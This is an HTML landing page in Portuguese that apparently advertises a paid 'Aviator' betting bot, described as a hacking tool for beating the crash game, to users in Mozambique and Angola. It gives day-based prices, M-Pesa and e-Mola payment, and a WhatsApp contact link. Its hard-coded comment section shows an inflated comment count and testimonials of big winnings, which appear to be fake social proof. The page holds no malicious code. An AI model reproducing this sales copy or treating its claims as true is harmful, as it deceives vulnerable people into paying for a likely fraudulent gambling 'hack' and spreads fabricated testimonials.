<!DOCTYPE html><html lang="pt-br"><head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <script src="https://unpkg.com/scrollreveal"></script>

<link rel=preconnect href=https://fonts.googleapis.com><link rel=preconnect href=https://fonts.gstatic.com crossorigin><link href="https://fonts.googleapis.com/css2?family=Oswald:wght@200..700&display=swap" rel=stylesheet><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/sweetalert/1.1.3/sweetalert.min.css><script src=https://code.jquery.com/jquery-3.7.1.js integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin=anonymous></script><script src=https://cdn.jsdelivr.net/npm/sweetalert2@11></script>


  <link rel="stylesheet" href="css/scrollbar.css">
  <link rel="stylesheet" href="css/styles.css">
  <link rel="stylesheet" href="css/header.css">
  <link rel="stylesheet" href="css/home.css">
  <link rel="stylesheet" href="css/sobre-mim.css">
  <link rel="stylesheet" href="css/habilidades.css">
  <link rel="stylesheet" href="css/projetos.css">
  <link rel="stylesheet" href="css/contato.css">
  <link rel="stylesheet" href="css/footer.css">
  <link rel="stylesheet" href="css/media-queries.css">
  <style>
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500&display=swap');
body{
  background-color:#1c1c1c;
}

* {
    margin: 0;
    padding: 0;
    font-family: 'Inter', Arial, sans-serif;
}

html {
    color: #FFFFFF;
    scroll-behavior: smooth;
}

}

.hide {
    display: none;
}

.btn {
    font-size: 14pt;
    font-weight: 700;
    text-decoration: none;
    padding: 14px 25px;
    border-radius: 8px;
    background-color: #1E90FF;
    color: #fff;
    transition: .5s;
    white-space: nowrap;
}

.btn:hover {
    background-color: rgb(23, 125, 255);
    transform: translate( 0px, 3px);
}

h2 {
    display: flex;
    justify-content: center;
    padding-top: 100px;
    font-size: 26px;
    padding-bottom: 30px;
}

 a {
    text-decoration: none;
}

/*--------SCROLL REVEAL---------*/
#btn-curriculo, 
.img-computer, 
.my-photo, 
.programas {
    visibility: hidden;
}

#sobre-mim div {
  display: flex;
  flex-direction: row;
  align-items: center;
  justify-content: center;
  gap: 6vw;
}

.my-photo {
  width: 270px;
  border-radius: 50%;
}

#sobre-mim-left {
  display: flex;
  flex-basis: 48%;
  text-align: start;
  font-size: 19px;
  line-height: 30px;
  color: #DCDCDC;
}

.img-and-content {
  padding: 2rem 2rem 0;
}
::-webkit-scrollbar {
    width: 12px;
}

::-webkit-scrollbar-track {
    background: #000000;
}

::-webkit-scrollbar-thumb {
    background: #87CEEB;
}

::-webkit-scrollbar-thumb:hover {
    background: #1E90FF;
}

.img-projeto {
  width: 100%;
  border-radius: 8px;
}

.galeria-projetos {
  display: flex;
  gap: 1.8rem;
  justify-content: center;
  padding: 2rem 2rem 0;
  flex-wrap: wrap;
}

.box-projeto {
  background-color: #E0FFFF;
  border-radius: 8px;
  display: flex;
  flex-direction: column;
  align-items: center;
  width: 340px;
  height: auto;
  transition: all .3s ease-in-out;
  box-shadow: 3px 2px 30px 8px rgba(255, 255, 255, 0.165) ;
}

.box-projeto h3 {
  padding: 12px 18px;
  color: #000000;
  font-weight: 500;
}

.box-projeto p {
  text-align: justify;
  color: #000000;
  padding: 0 1rem;
  margin-bottom: 2rem;
}
.box-projeto:hover {
  transform: scale(1.04);
}

.btn-mais-detalhes{
  margin: auto auto 2rem;
}

#seta {
  position: absolute;
  padding: 16px;
  box-shadow: 4px -4px 0px 1px #1E90FF inset;
  border: solid transparent;
  border-width: 0 0 2px 2px;
  transform: rotate(-45deg);
  left: calc(50% - 16px);
  margin: 0;    
}

#btnVerMais {
  display: block; 
  cursor: pointer; 
  border: none;
  margin-inline: auto;
  margin-top: 15px;
  padding: 16px 10px;
  color: #1E90FF;
  font-size: 20px;
  background: transparent;
  font-weight: bold;
  filter: drop-shadow(2px 2px 10px #1E90FF);
}

.esconder {
  display: none;
}
@media screen and (max-width: 650px) {
  .tec-content {
      flex-direction: column;
      gap: 12vw;
      padding: 2rem;
  }

  .outros-conhecimentos {
      padding: 0;
  }

  footer {
      flex-direction: column;
      gap: 20px; 
      height: 210px; 
  }

  .img-and-content p {
      text-align: justify;
  }
}

@media screen and (max-width: 800px) {
  #home {
      display: flex;
      flex-direction: column;
      justify-content: flex-start;
      gap: 20px;
      min-height: calc(100vh - 250px);
      padding-top: 150px;
  }

  .img-computer {
      width: 60vw;
      margin-top: 15px;
  }

  #header {
      padding: 1rem 1rem;
  }

  #btn-mobile {
      border: none;
      display: block;
      background: transparent;
      cursor: pointer;
  }

  #menu {
      display: block; 
      position: absolute;
      width: 100%;
      top: 70px;
      right: 0px;
      background: #000;
      transition: .4s;
      height: 0px;
      visibility: hidden;
      overflow-y: hidden;
  }

  #nav.active  #menu {
      height: 100vh;
      visibility: visible; 
  }

  #menu a {
      padding: 1.3rem 0;
      text-align: center;
      margin: 0 1rem;
      border-bottom: 2px solid rgba(255, 255, 255, .05);
  }

  #sobre-mim div {
      flex-direction: column;
  }

  #programas-text {
      display: block;
  }

  .descrição-tec {
      width: 80%;
      margin: 30px auto 60px;
  }
}

@media screen and (max-width: 400px) {
  #home h1 {
      font-size: 6.6vw;
  }

  #home h1 span {
      font-size: 9.4vw;
  }

  .my-photo {
      width: 64vw;
  }
  .descrição-tec {
      width: 100%;
  }
}
#menu a {
  color: #fff;
  font-size: 18px;
}

#menu a:hover {
  background: #1c1c1c;
  transition: .5s;
}

#logo {
  width: 40px;
}

#header {
  box-sizing: border-box;
  height: 80px;
  padding: 1rem 5rem;
  display: flex;
  align-items: center;
  justify-content: space-between;
  background: #000;
  position: fixed;
  width: 100%;
  z-index: 1000;
}

#menu {
  display: flex;
  list-style: none;
  gap: .5rem;
}

#menu a {
  display: block;
  padding: .8rem;
}

#btn-mobile {
  display: none;
}
.icon {
  height: 80px;
  width: 80px;
}

.tec-content {
  padding: 2rem 2rem 0;
}

.programas {
  display: flex;
  flex-wrap: wrap;
  justify-content: center;
  gap: 20px;
  margin-bottom: 60px;
  flex-basis: 40%;
}

.item-programa {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  cursor: pointer;
  transition: all .1s ease-in-out;
}

.item-programa p {
  margin-bottom: 5px;
}

.item-programa:hover {
  transition: .5s;
  transform: scale(1.1);
  color: #1E90FF;
}

#programas-text {
  display: flex;
  justify-content: center;
  gap: 50px;
  text-align: center;
}

#instrucao {
  margin-bottom: 40px;
  color: rgba(255, 255, 255, .4);
}

.descrição-tec {
  flex-basis: 40%;
  font-size: 20px;
}

.outros-conhecimentos {
  padding: 12px 8% 0;
}

.outros-conhecimentos ul {
  list-style: circle;
  padding: 18px 8px 0;
  color: #DCDCDC;
}

.form-contato {
  width: 80vw;
  padding: 0px 5px 100px;
  margin: 0 auto;
}

#contato input, #contato textarea {
  margin: 8px 0px 20px;
  font-size: 18px;
  border-radius: 8px;
  border: none;
  background-color: #E0FFFF;
  width: 100%;
  box-sizing: border-box;
  padding: 10px 10px;
}

#contato textarea { 
  min-height: 200px;
  max-height: 500px;
  resize: vertical;
}

#btn-submit {
  border: none;
  cursor: pointer;
  display: block;
  margin: 32px auto;
  width: 200px;
}

#contato label {
  color: #DCDCDC;
}

#contato label span {
  color: #b0041b;
}

::placeholder {
  font-size: 16px;
  color: #1c1c1c8d;
}
#home {
  display: flex;
  align-items: center;
  padding: 100px 2rem 0;
  justify-content: space-around;
  min-height: calc(100vh - 150px);
  margin-top: 0;
}

.img-computer {
  width: 400px;
  animation: float 1s linear infinite alternate-reverse;
}

#home h1 {
  font-size: 26px;
  margin-bottom: 18px;
}

#home h1 span {
  font-size: 38px;
  color: #1E90FF;
  font-weight: 600;
}

#home h1 span::after {
  content: '|';
  margin-left: 3px;
  opacity: 1;
  animation: pisca .7s infinite;
}

.icon-link {
  width: 40px;
  transition: all .1s ease-in-out
}

.icon-link:hover, .icon-link2:hover {
  transform: scale(1.1);
}

.curriculo {
  text-align: center;
  margin-top: 60px;
}

@keyframes pisca {
  0%, 100% {
      opacity: 1;
  }
  50% {
      opacity: 0;
  }
}

@keyframes float {
  to {
      transform: translate( 0px, 23px);
  }
}

}
h5{
  color:green;
}
#fbcomment{
  background:#fff;
  border: 1px solid #dddfe2;
  border-radius: 3px;
  color: #4b4f56;
  padding:50px;
}
.header_comment{
    font-size: 14px;
    overflow: hidden;
    border-bottom: 1px solid #e9ebee;
    line-height: 25px;
    margin-bottom: 24px;
    padding: 10px 0;
}
.sort_title{
  color: #4b4f56;
}
.sort_by{
  background-color: #f5f6f7;
  color: #4b4f56;
  line-height: 22px;
  cursor: pointer;
  vertical-align: top;
  font-size: 12px;
  font-weight: bold;
  vertical-align: middle;
  padding: 4px;
  justify-content: center;
  border-radius: 2px;
  border: 1px solid #ccd0d5;
}
.count_comment{
  font-weight: 600;
}
.body_comment{
    padding: 0 8px;
    font-size: 14px;
    display: block;
    line-height: 25px;
    word-break: break-word;
}
.avatar_comment{
  display: block;
}
.avatar_comment img{
  height: 48px;
  width: 48px;
}
h6{
  background-color:rgba(39,33,30,0.825);
  color:white;
  font-size:25px;
  border-radius:15px;
}
.box_comment{
	display: block;
    position: relative;
    line-height: 1.358;
    word-break: break-word;
    border: 1px solid #d3d6db;
    word-wrap: break-word;
    background: #fff;
    box-sizing: border-box;
    cursor: text;
    font-family: Helvetica, Arial, sans-serif;
    font-size: 16px;
	padding: 0;
}
.box_comment textarea{
	min-height: 40px;
	padding: 12px 8px;
	width: 100%;
	border: none;
	resize: none;
}
.box_comment textarea:focus{
  outline: none !important;
}
.box_comment .box_post{
	border-top: 1px solid #d3d6db;
    background: #f5f6f7;
    padding: 8px;
    display: block;
    overflow: hidden;
}
.box_comment label{
  display: inline-block;
  vertical-align: middle;
  font-size: 11px;
  color: #90949c;
  line-height: 22px;
}
.box_comment button{
  margin-left:8px;
  background-color: #4267b2;
  border: 1px solid #4267b2;
  color: #fff;
  text-decoration: none;
  line-height: 22px;
  border-radius: 2px;
  font-size: 14px;
  font-weight: bold;
  position: relative;
  text-align: center;
}
.box_comment button:hover{
  background-color: #29487d;
  border-color: #29487d;
}
.box_comment .cancel{
	margin-left:8px;
	background-color: #f5f6f7;
	color: #4b4f56;
	text-decoration: none;
	line-height: 22px;
	border-radius: 2px;
	font-size: 14px;
	font-weight: bold;
	position: relative;
	text-align: center;
  border-color: #ccd0d5;
}
.box_comment .cancel:hover{
	background-color: #d0d0d0;
	border-color: #ccd0d5;
}
.box_comment img{
  height:16px;
  width:16px;
}
.box_result{
  margin-top: 24px;
}
.box_result .result_comment h4{
  font-weight: 600;
  white-space: nowrap;
  color: #365899;
  cursor: pointer;
  text-decoration: none;
  font-size: 14px;
  line-height: 1.358;
  margin:0;
}
.box_result .result_comment{
  display:block;
  overflow:hidden;
  padding: 0;
}
.child_replay{
	border-left: 1px dotted #d3d6db;
	margin-top: 12px;
	list-style: none;
	padding:0 0 0 8px
}
.reply_comment{
	margin:12px 0;
}
.box_result .result_comment p{
  margin: 4px 0;
  text-align:justify;
}
.box_result .result_comment .tools_comment{
  font-size: 12px;
  line-height: 1.358;
}
.box_result .result_comment .tools_comment a{
  color: #4267b2;
  cursor: pointer;
  text-decoration: none;
}
.box_result .result_comment .tools_comment span{
  color: #90949c;
}
.body_comment .show_more{
  background: #3578e5;
  border: none;
  box-sizing: border-box;
  color: #fff;
  font-size: 14px;
  margin-top: 24px;
  padding: 12px;
  text-shadow: none;
  width: 100%;
  font-weight:bold;
  position: relative;
  text-align: center;
  vertical-align: middle;
  border-radius: 2px;
}
a{
  color:rgb(45,215,21);
  background-color: white;
  border-radius: 30px;
  font-size: 30px;
  text-decoration: none;
}
  </style>

  <title>Home | sakuna</title>
  <link rel="shortcut icon" href="https://i.ibb.co/SQZBXcX/20231122-231125.png">
</head>

<body>

  <header id="header">
    <a id="link-logo" href="#home">
      <img id="logo" src="https://i.ibb.co/SQZBXcX/20231122-231125.png" alt="">
    </a>
    <nav id="nav">
      <button id="btn-mobile"><img id="icon-menu" src="images/icon-menu.svg" alt=""></button>
      <ul id="menu">
        <li class="link"><a id="link1" href="#home">Home</a></li>
        <li class="link"><a id="link2" href="#sobre-mim">Sobre nøs</a></li>
        <li class="link"><a id="link3" href="#habilidades">ferramentas</a></li>
        <li class="link"><a id="link4" href="#projetos">pagamento</a></li>
        <li class="link"><a id="link5" href="#contato">comentarios</a></li>
      </ul>
    </nav>
  </header>

  <main>
    <section id="home">
      <div class="content-left">
        <h1>
          Olá, nòs somos <br>
          <span>empresa sakuna </span><br>
           Front-end website
        </h1>
        <div id="icon-home">
 <button onclick="changeColor('rgb(1,114,92)')">brilho</button>
    <button onclick="changeColor('#048881')">Brilho</button>
    <button onclick="changeColor('black')">brilho</button>
    <button onclick="changeColor('#3c7a28')">brilho</button>
    <br>
&#xF68D;
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-amazon" viewBox="0 0 16 16">
  <path d="M10.813 11.968c.157.083.36.074.5-.05l.005.005a90 90 0 0 1 1.623-1.405c.173-.143.143-.372.006-.563l-.125-.17c-.345-.465-.673-.906-.673-1.791v-3.3l.001-.335c.008-1.265.014-2.421-.933-3.305C10.404.274 9.06 0 8.03 0 6.017 0 3.77.75 3.296 3.24c-.047.264.143.404.316.443l2.054.22c.19-.009.33-.196.366-.387.176-.857.896-1.271 1.703-1.271.435 0 .929.16 1.188.55.264.39.26.91.257 1.376v.432q-.3.033-.621.065c-1.113.114-2.397.246-3.36.67C3.873 5.91 2.94 7.08 2.94 8.798c0 2.2 1.387 3.298 3.168 3.298 1.506 0 2.328-.354 3.489-1.54l.167.246c.274.405.456.675 1.047 1.166ZM6.03 8.431C6.03 6.627 7.647 6.3 9.177 6.3v.57c.001.776.002 1.434-.396 2.133-.336.595-.87.961-1.465.961-.812 0-1.286-.619-1.286-1.533M.435 12.174c2.629 1.603 6.698 4.084 13.183.997.28-.116.475.078.199.431C13.538 13.96 11.312 16 7.57 16 3.832 16 .968 13.446.094 12.386c-.24-.275.036-.4.199-.299z"/>
  <path d="M13.828 11.943c.567-.07 1.468-.027 1.645.204.135.176-.004.966-.233 1.533-.23.563-.572.961-.762 1.115s-.333.094-.23-.137c.105-.23.684-1.663.455-1.963-.213-.278-1.177-.177-1.625-.13l-.09.009q-.142.013-.233.024c-.193.021-.245.027-.274-.032-.074-.209.779-.556 1.347-.623"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-airplane-engines" viewBox="0 0 16 16">
  <path d="M8 0c-.787 0-1.292.592-1.572 1.151A4.35 4.35 0 0 0 6 3v3.691l-2 1V7.5a.5.5 0 0 0-.5-.5h-1a.5.5 0 0 0-.5.5v1.191l-1.17.585A1.5 1.5 0 0 0 0 10.618V12a.5.5 0 0 0 .582.493l1.631-.272.313.937a.5.5 0 0 0 .948 0l.405-1.214 2.21-.369.375 2.253-1.318 1.318A.5.5 0 0 0 5.5 16h5a.5.5 0 0 0 .354-.854l-1.318-1.318.375-2.253 2.21.369.405 1.214a.5.5 0 0 0 .948 0l.313-.937 1.63.272A.5.5 0 0 0 16 12v-1.382a1.5 1.5 0 0 0-.83-1.342L14 8.691V7.5a.5.5 0 0 0-.5-.5h-1a.5.5 0 0 0-.5.5v.191l-2-1V3c0-.568-.14-1.271-.428-1.849C9.292.591 8.787 0 8 0M7 3c0-.432.11-.979.322-1.401C7.542 1.159 7.787 1 8 1s.458.158.678.599C8.889 2.02 9 2.569 9 3v4a.5.5 0 0 0 .276.447l5.448 2.724a.5.5 0 0 1 .276.447v.792l-5.418-.903a.5.5 0 0 0-.575.41l-.5 3a.5.5 0 0 0 .14.437l.646.646H6.707l.647-.646a.5.5 0 0 0 .14-.436l-.5-3a.5.5 0 0 0-.576-.411L1 11.41v-.792a.5.5 0 0 1 .276-.447l5.448-2.724A.5.5 0 0 0 7 7z"/>
</svg>

          <a target="_blank" href="#">
            <img src="https://i.ibb.co/SPD2zGD/icon-linkedin.png" class="icon-link" alt="Ícone do LinkedIn">
          </a>
          <a target="_blank" href="#">
            <img src="https://i.ibb.co/4ppz1M3/icon-github.png" class="icon-link" alt="Ícone do Github">
          </a>
        </div>
        <br>
        <center>
        <a href="https://sakuna-web.netlify.app/">Tela de login</a>
<!--login -->
      </div>

      <img src="https://i.ibb.co/41KVTV8/computer.png" alt="Ilustração de um computador" class="img-computer">
    </section>

    <section id="sobre-mim">
      <h2>Sobre nòs</h2>
      <div class="img-and-content">
        <div id="sobre-mim-left">
          <p>
            esse site foi criado nada + nada - para ajudar os {moçambicanos e angolanos} a dar um basta nas velas azuis usando nossas feramentas de operação crack fire one 
             <br> 
             mas informaçøēs abaixo
          </p>
        </div>
        <img src="https://i.ibb.co/pz7z2HT/minha-foto.jpg" alt="Foto de Lucas" class="my-photo">
      </div>
    </section>

    <section id="habilidades">
      <h2>nosso robô aviator criado pelas linguagens abaixo de programação</h2>
      <div class="tec-content">
        <div id="programas-text">
          <div class="programas">
            <div class="item-programa" id="react">
              <p>React</p>
              <img src="https://i.ibb.co/ScSFBhG/icon-react.png" class="icon" alt="Ícone React">
            </div>
            <div class="item-programa" id="js">
              <p>JavaScript</p>
              <img src="https://i.ibb.co/8spcWKw/icon-javascript.png" class="icon" alt="Ícone Javascript">
            </div>
            <div class="item-programa" id="ts">
              <p>TypeScript</p>
              <img src="https://i.ibb.co/Hh0STT1/icon-ts.png" class="icon" alt="Ícone TypeScript">
            </div>
            <div class="item-programa" id="html">
              <p>HTML5</p>
              <img src="https://i.ibb.co/d27cC9J/icon-html.png" class="icon" alt="Ícone HTML5">
            </div>
            <div class="item-programa" id="css">
              <p>CSS3</p>
              <img src="https://i.ibb.co/FVvHSM8/icon-css.png" class="icon" alt="Ícone CSS3">
            </div>
            
            <div class="item-programa" id="js">
              <p>Bootstrap</p>
              <img src="https://i.ibb.co/1rSfyr1/bootstrap-original.png" class="icon" alt="Ícone Bootstrap">
            </div>
            <div class="item-programa" id="git">
              <p>Git</p>
              <img src="https://i.ibb.co/xHFpnKg/icon-git.png" class="icon" alt="Ícone GIT">
            </div>
            <div class="item-programa" id="gith">
              <p>GitHub</p>
              <img src="https://i.ibb.co/4ppz1M3/icon-github.png" class="icon" alt="Ícone GITHUB">
            </div>
            
          </div>

          <div class="descrição-tec">
            <p id="instrucao">/*Passe o mouse por cima das tecnologias para ver a descrição*/</p>
            <p class="hide desc-text" id="desc-figma">React <br> <br>
              No momento estou estudando esta biblioteca JavaScript através da Alura. Comecei recentemente e estou progredindo diariamente.
            </p>
            <p class="hide desc-text" id="desc-js">JavaScript <br> <br>
              Linguagem de programação, usada para deixar a página dinâmica. Conheço bem a tecnologia e no momento estou estudando um de seus framework.
            </p>
            <p class="hide desc-text" id="desc-js">TypeScript <br> <br>
              TypeScript é um superconjunto de JavaScript, ou seja, um conjunto de ferramentas e formas mais eficientes de escrever código JavaScript, adicionando recursos que não estão presentes de maneira nativa na linguagem.
            </p>
            <p class="hide desc-text" id="desc-html">HTML5 <br> <br>
              É uma linguagem de marcação utilizada na construção de páginas Web, na qual já tenho certa prática e
              consigo trabalhar com ela sem nenhuma dificuldade.
            </p>
            <p class="hide desc-text" id="desc-css">CSS3 <br> <br>
              Utilizado para a estilização de páginas Web, tenho conhecimento em bastantes recursos, além de sempre
              estar praticando e conhecendo novas funcionalidades.
            </p>
            <p class="hide desc-text" id="desc-js">Bootstrap <br> <br>
              Bootstrap é um framework web com código-fonte aberto para desenvolvimento de componentes de interface e front-end para sites e aplicações web, usando HTML, CSS e JavaScript. Já utilizei algumas vezes e ajuda muito devido sua praticidade.
            </p>
            <p class="hide desc-text" id="desc-git">Git <br> <br>
              É um sistema de controle de versões distribuído, usado principalmente no desenvolvimento de software.
            </p>
            <p class="hide desc-text" id="desc-github">GitHub <br> <br>
              É uma plataforma de hospedagem de código-fonte e arquivos com controle de versão usando o Git.
            </p>
            
          </div>
        </div>
        <div class="outros-conhecimentos">
          <h3>podes fazer pagamento atravé:</h3>
          <ul>
            <li>também angolanos ja podem fazer tansferecias sò entrar em contacto;</li>
            <li>emola moz;</li>
            <li>m-pesa moz;</li>
          </ul>
        </div>
      </div>

    </section>

    <section id="projetos">
      <h2>©todos direitos reservados</h2>
      <div class="galeria-projetos">
        <div class="box-projeto">
          <img class="img-projeto" src="https://i.ibb.co/wYGPw9V/proj-copa.png" alt="Imagem do projeto portfólio">
          <h3>Angola acesso</h3>
          <p>
         <p>1dia--50kz</p> 
         
          
           <p> 3dias---250kz</p>
            <p>7dias----500ks</p>
            
           <p> 🅽🅱:não compre o bot com qualquer pessoa procura mas informaçøēs sobre os rev do bot para evitar burlas</p>
            
            
            .</p>
          <a target="_blank" href="https://wa.me/message/HT5MNKPHWNXJA1" class="btn btn-mais-detalhes">clica me<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-whatsapp" viewBox="0 0 16 16">
  <path d="M13.601 2.326A7.85 7.85 0 0 0 7.994 0C3.627 0 .068 3.558.064 7.926c0 1.399.366 2.76 1.057 3.965L0 16l4.204-1.102a7.9 7.9 0 0 0 3.79.965h.004c4.368 0 7.926-3.558 7.93-7.93A7.9 7.9 0 0 0 13.6 2.326zM7.994 14.521a6.6 6.6 0 0 1-3.356-.92l-.24-.144-2.494.654.666-2.433-.156-.251a6.56 6.56 0 0 1-1.007-3.505c0-3.626 2.957-6.584 6.591-6.584a6.56 6.56 0 0 1 4.66 1.931 6.56 6.56 0 0 1 1.928 4.66c-.004 3.639-2.961 6.592-6.592 6.592m3.615-4.934c-.197-.099-1.17-.578-1.353-.646-.182-.065-.315-.099-.445.099-.133.197-.513.646-.627.775-.114.133-.232.148-.43.05-.197-.1-.836-.308-1.592-.985-.59-.525-.985-1.175-1.103-1.372-.114-.198-.011-.304.088-.403.087-.088.197-.232.296-.346.1-.114.133-.198.198-.33.065-.134.034-.248-.015-.347-.05-.099-.445-1.076-.612-1.47-.16-.389-.323-.335-.445-.34-.114-.007-.247-.007-.38-.007a.73.73 0 0 0-.529.247c-.182.198-.691.677-.691 1.654s.71 1.916.81 2.049c.098.133 1.394 2.132 3.383 2.992.47.205.84.326 1.129.418.475.152.904.129 1.246.08.38-.058 1.171-.48 1.338-.943.164-.464.164-.86.114-.943-.049-.084-.182-.133-.38-.232"/>
</svg></a>
        </div>
        <div class="box-projeto">
          <img class="img-projeto" src="https://i.ibb.co/1Z2DGfz/img-viagens.png" alt="Web site de viagem">
          <h3>moçambique acesso</h3>
          <p>
            
         <p>1dia--100mzn</p> 
         
          
           <p> 3dias---250mzn</p>
            <p>7dias----500mzn</p>
            
           <p> 🅽🅱:não compre o bot com qualquer pessoa procura mas informaçøēs sobre os rev do bot para evitar burlas</p>
            
          </p>
          <a target="_blank" href="https://wa.me/message/HT5MNKPHWNXJA1" class="btn btn-mais-detalhes">clica me<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-whatsapp" viewBox="0 0 16 16">
  <path d="M13.601 2.326A7.85 7.85 0 0 0 7.994 0C3.627 0 .068 3.558.064 7.926c0 1.399.366 2.76 1.057 3.965L0 16l4.204-1.102a7.9 7.9 0 0 0 3.79.965h.004c4.368 0 7.926-3.558 7.93-7.93A7.9 7.9 0 0 0 13.6 2.326zM7.994 14.521a6.6 6.6 0 0 1-3.356-.92l-.24-.144-2.494.654.666-2.433-.156-.251a6.56 6.56 0 0 1-1.007-3.505c0-3.626 2.957-6.584 6.591-6.584a6.56 6.56 0 0 1 4.66 1.931 6.56 6.56 0 0 1 1.928 4.66c-.004 3.639-2.961 6.592-6.592 6.592m3.615-4.934c-.197-.099-1.17-.578-1.353-.646-.182-.065-.315-.099-.445.099-.133.197-.513.646-.627.775-.114.133-.232.148-.43.05-.197-.1-.836-.308-1.592-.985-.59-.525-.985-1.175-1.103-1.372-.114-.198-.011-.304.088-.403.087-.088.197-.232.296-.346.1-.114.133-.198.198-.33.065-.134.034-.248-.015-.347-.05-.099-.445-1.076-.612-1.47-.16-.389-.323-.335-.445-.34-.114-.007-.247-.007-.38-.007a.73.73 0 0 0-.529.247c-.182.198-.691.677-.691 1.654s.71 1.916.81 2.049c.098.133 1.394 2.132 3.383 2.992.47.205.84.326 1.129.418.475.152.904.129 1.246.08.38-.058 1.171-.48 1.338-.943.164-.464.164-.86.114-.943-.049-.084-.182-.133-.38-.232"/>
</svg></a>
        </div>
        <div class="box-projeto">
          <img class="img-projeto" src="https://i.ibb.co/hHykBtF/quizz1.png" alt="Imagem do projeto Burguer Castle">
          <h3>moçambique acesso</h3>
          <p>
            
         <p>1dia--120mzn</p> 
         
          
           <p> 3dias---280mzn</p>
            <p>7dias----500mzn</p>
            
           <p> 🅽🅱:não compre o bot com qualquer pessoa procura mas informaçøēs sobre os rev do bot para evitar burlas</p>
          </p>
          <a target="_blank" href="https://wa.me/message/HT5MNKPHWNXJA1" class="btn btn-mais-detalhes">clica me<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-whatsapp" viewBox="0 0 16 16">
  <path d="M13.601 2.326A7.85 7.85 0 0 0 7.994 0C3.627 0 .068 3.558.064 7.926c0 1.399.366 2.76 1.057 3.965L0 16l4.204-1.102a7.9 7.9 0 0 0 3.79.965h.004c4.368 0 7.926-3.558 7.93-7.93A7.9 7.9 0 0 0 13.6 2.326zM7.994 14.521a6.6 6.6 0 0 1-3.356-.92l-.24-.144-2.494.654.666-2.433-.156-.251a6.56 6.56 0 0 1-1.007-3.505c0-3.626 2.957-6.584 6.591-6.584a6.56 6.56 0 0 1 4.66 1.931 6.56 6.56 0 0 1 1.928 4.66c-.004 3.639-2.961 6.592-6.592 6.592m3.615-4.934c-.197-.099-1.17-.578-1.353-.646-.182-.065-.315-.099-.445.099-.133.197-.513.646-.627.775-.114.133-.232.148-.43.05-.197-.1-.836-.308-1.592-.985-.59-.525-.985-1.175-1.103-1.372-.114-.198-.011-.304.088-.403.087-.088.197-.232.296-.346.1-.114.133-.198.198-.33.065-.134.034-.248-.015-.347-.05-.099-.445-1.076-.612-1.47-.16-.389-.323-.335-.445-.34-.114-.007-.247-.007-.38-.007a.73.73 0 0 0-.529.247c-.182.198-.691.677-.691 1.654s.71 1.916.81 2.049c.098.133 1.394 2.132 3.383 2.992.47.205.84.326 1.129.418.475.152.904.129 1.246.08.38-.058 1.171-.48 1.338-.943.164-.464.164-.86.114-.943-.049-.084-.182-.133-.38-.232"/>
</svg></a>
        </div>

      </div>

      <button id="btnVerMais">VER MAIS <br> <span id="seta"></span></button>

    </section>





	<div class="container">
		<div class="col-md-12" id="fbcomment">
			<div class="header_comment">
				<div class="row">
					<div class="col-md-6 text-left">
					  <span class="count_comment">264235 Comments</span>
					</div>
					<div class="col-md-6 text-right">
					  <span class="sort_title">Sort by</span>
					  <select class="sort_by">
						<option>Top</option>
						<option>Newest</option>
						<option>Oldest</option>
					  </select>
					</div>
				</div>
			</div>

			<div class="body_comment">
				<div class="row">
					<div class="avatar_comment col-md-1">
					  <img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar"/>
					</div>
					<div class="box_comment col-md-11">
					  <textarea class="commentar" placeholder="Add a comment..."></textarea>
					  <div class="box_post">
						<div class="pull-left">
						  <input type="checkbox" id="post_fb"/>
						  <label for="post_fb">Also post on Facebook</label>
						</div>
						<div class="pull-right">
						  <span>
							<img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar" />
							<i class="fa fa-caret-down"></i>
						  </span>
						  <button onclick="submit_comment()" type="button" value="1">Post</button>
						</div>
					  </div>
					</div>
				</div>
				<div class="row">
					<ul id="list_comment" class="col-md-12">
						<!-- Start List Comment 1 -->
						<li class="box_result row">
							<div class="avatar_comment col-md-1">
								<img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar"/>
							</div>
							<div class="result_comment col-md-11">
								<h4>zelton artur modlane</h4>
								<p>pessoa a cena e realy sò testar eu agradeço manos🥰l!!</p>
								<div class="tools_comment">
									<a class="like" href="#">Like</a>
									<span aria-hidden="true"> · </span>
									<a class="replay" href="#">Reply</a>
									<span aria-hidden="true"> · </span>
									<i class="fa fa-thumbs-o-up"></i> <span class="count">1</span> 
									<span aria-hidden="true"> · </span>
									<span>26m</span>
								</div>
								<ul class="child_replay">
									<li class="box_reply row">
										<div class="avatar_comment col-md-1">
											<img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar"/>
										</div>
										 <div class="result_comment col-md-11">
											<h4>Sergito matias</h4>
											<p>brow vc é mau juro hiii😇 vcs são hackers de verdade.</p>
											<div class="tools_comment">
												<a class="like" href="#">Like</a>
												<span aria-hidden="true"> · </span>
												<a class="replay" href="#">Reply</a>
												<span aria-hidden="true"> · </span>
												<i class="fa fa-thumbs-o-up"></i> <span class="count">1</span> 
												<span aria-hidden="true"> · </span>
												<span>26m</span>
											</div>
											<ul class="child_replay"></ul>
										</div>
									</li>
								</ul>
							</div>
						</li>
						
						<!-- Start List Comment 2 -->
						<li class="box_result row">
							<div class="avatar_comment col-md-1">
								<img src="https://static.xx.fbcdn.net/rsrc.php/v1/yi/r/odA9sNLrE86.jpg" alt="avatar"/>
							</div>
							<div class="result_comment col-md-11">
								<h4>flow flow winderson</h4>
								<p>recomendo pessoal entrei nesses gajos  de manhã fiz 1000mt com 35mt de noite meti 100 mt fiz 3500mt brow valeu hiii  🤩).</p>
								<div class="tools_comment">
									<a class="like" href="#">Like</a>
									<span aria-hidden="true"> · </span>
